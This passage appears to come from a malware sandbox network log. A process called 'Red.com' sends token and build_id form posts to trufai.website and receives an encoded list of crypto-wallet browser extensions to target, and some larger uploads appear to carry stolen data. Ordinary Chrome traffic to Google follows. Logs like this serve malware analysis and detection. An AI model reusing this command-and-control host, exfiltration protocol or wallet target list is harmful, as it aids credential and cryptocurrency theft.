name="token"5a17db381a43ee3e4a357c45c7d2568a------fcjeuk6x4wtjmycjwbaiContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------fcjeuk6x4wtjmycjwbaiCont
2025-01-03 13:30:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:30:35 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:35 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----kngv3e3wlfk68yusriec User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:35 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 6b 6e 67 76 33 65 33 77 6c 66 6b 36 38 79 75 73 72 69 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 6b 6e 67 76 33 65 33 77 6c 66 6b 36 38 79 75 73 72 69 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 6b 6e 67 76 33 65 33 77 6c 66 6b 36 38 79 75 73 72 69 65 63 0d 0a 43 6f 6e 74 Data Ascii: ------kngv3e3wlfk68yusriecContent-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------kngv3e3wlfk68yusriecContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------kngv3e3wlfk68yusriecCont
2025-01-03 13:30:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:30:36 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:37 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----p8q1n7gvkng47y5x47y5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 7597 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:37 UTC	7597	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 70 38 71 31 6e 37 67 76 6b 6e 67 34 37 79 35 78 34 37 79 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 70 38 71 31 6e 37 67 76 6b 6e 67 34 37 79 35 78 34 37 79 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 70 38 71 31 6e 37 67 76 6b 6e 67 34 37 79 35 78 34 37 79 35 0d 0a 43 6f 6e 74 Data Ascii: ------p8q1n7gvkng47y5x47y5Content-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------p8q1n7gvkng47y5x47y5Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------p8q1n7gvkng47y5x47y5Cont
2025-01-03 13:30:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:30:38 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:38 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----usjm7yus0r1v3ekxbs00 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:38 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 75 73 6a 6d 37 79 75 73 30 72 31 76 33 65 6b 78 62 73 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 75 73 6a 6d 37 79 75 73 30 72 31 76 33 65 6b 78 62 73 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 75 73 6a 6d 37 79 75 73 30 72 31 76 33 65 6b 78 62 73 30 30 0d 0a 43 6f 6e 74 Data Ascii: ------usjm7yus0r1v3ekxbs00Content-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------usjm7yus0r1v3ekxbs00Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------usjm7yus0r1v3ekxbs00Cont
2025-01-03 13:30:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:30:39 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	172.217.18.4	443	2916	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:41 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-03 13:30:42 UTC	1266	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 13:30:42 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce--8Y5UOIyz9OIt5Vz-yFgyg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-01-03 13:30:42 UTC	124	IN	Data Raw: 33 35 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 67 6f 6c 64 65 6e 20 73 74 61 74 65 20 77 61 72 72 69 6f 72 73 20 70 68 69 6c 61 64 65 6c 70 68 69 61 20 37 36 65 72 73 22 2c 22 74 68 75 72 61 79 61 20 34 20 73 70 61 63 65 78 20 6c 61 75 6e 63 68 20 63 61 70 65 20 63 61 6e 61 76 65 72 61 6c 22 2c 22 73 6f 75 74 68 20 6b 6f 72 65 61 20 66 6c 69 67 68 74 20 72 65 64 64 69 Data Ascii: 355)]}'["",["golden state warriors philadelphia 76ers","thuraya 4 spacex launch cape canaveral","south korea flight reddi
2025-01-03 13:30:42 UTC	736	IN	Data Raw: 74 22 2c 22 77 69 63 6b 65 64 20 6d 75 73 69 63 61 6c 20 6d 6f 76 69 65 20 73 74 72 65 61 6d 69 6e 67 22 2c 22 66 6f 67 20 63 68 65 6d 69 63 61 6c 20 73 6d 65 6c 6c 22 2c 22 73 6f 6e 79 20 70 6c 61 79 73 74 61 74 69 6f 6e 22 2c 22 67 65 6f 72 67 69 61 20 70 6c 61 79 65 72 73 20 6d 69 73 73 69 6e 67 20 73 75 67 61 72 20 62 6f 77 6c 22 2c 22 71 75 61 64 72 61 6e 74 69 64 73 20 6d 65 74 65 6f 72 20 73 68 6f 77 65 72 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a Data Ascii: t","wicked musical movie streaming","fog chemical smell","sony playstation","georgia players missing sugar bowl","quadrantids meteor showers"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJ
2025-01-03 13:30:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49753	172.217.18.4	443	2916	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:42 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-03 13:30:42 UTC	1018	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 03 Jan 2025 13:30:42 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-01-03 13:30:42 UTC	372	IN	Data Raw: 31 39 37 32 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 1972)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2025-01-03 13:30:42 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2025-01-03 13:30:42 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2025-01-03 13:30:42 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2025-01-03 13:30:42 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2025-01-03 13:30:42 UTC	590	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 39 34 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700294,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window
2025-01-03 13:30:42 UTC	323	IN	Data Raw: 31 33 63 0d 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 79 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 49 20 2e 67 62 5f 41 5c 22 29 2c 7a 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 23 67 62 2e 67 62 5f 52 63 5c 22 29 3b 79 64 5c 75 30 30 32 36 5c 75 30 30 32 36 21 7a 64 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 78 64 28 5f 2e 67 64 2c 79 64 2c 5c 22 63 6c 69 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 5f 2e 41 64 5c 75 30 30 33 64 74 79 70 65 6f 66 20 41 73 79 6e Data Ascii: 13c}catch(e){_._DumpException(e)}\ntry{\nvar yd\u003ddocument.querySelector(\".gb_I .gb_A\"),zd\u003ddocument.querySelector(\"#gb.gb_Rc\");yd\u0026\u0026!zd\u0026\u0026_.xd(_.gd,yd,\"click\");\n}catch(e){_._DumpException(e)}\ntry{\n_.Ad\u003dtypeof Asyn
2025-01-03 13:30:42 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 53 6e 61 70 73 68 6f 74 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 75 6e 63 74 69 6f 6e 5c 22 3f 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 5c 75 30 30 32 36 5c 75 30 30 32 36 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 2e 77 72 61 70 28 61 29 3a 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 42 64 3b 42 64 5c 75 30 30 33 64 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 5f 2e 6b 64 7b 7d 3b 5f 2e 43 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 62 20 69 6e 20 61 2e 69 29 72 65 74 75 72 6e 20 61 2e 69 5b 62 5d 3b 74 68 72 6f 77 20 6e 65 77 20 42 64 3b Data Ascii: 8000Snapshot\u003d\u003d\u003d\"function\"?a\u003d\u003ea\u0026\u0026AsyncContext.Snapshot.wrap(a):a\u003d\u003ea;\n}catch(e){_._DumpException(e)}\ntry{\nvar Bd;Bd\u003dclass extends _.kd{};_.Cd\u003dfunction(a,b){if(b in a.i)return a.i[b];throw new Bd;
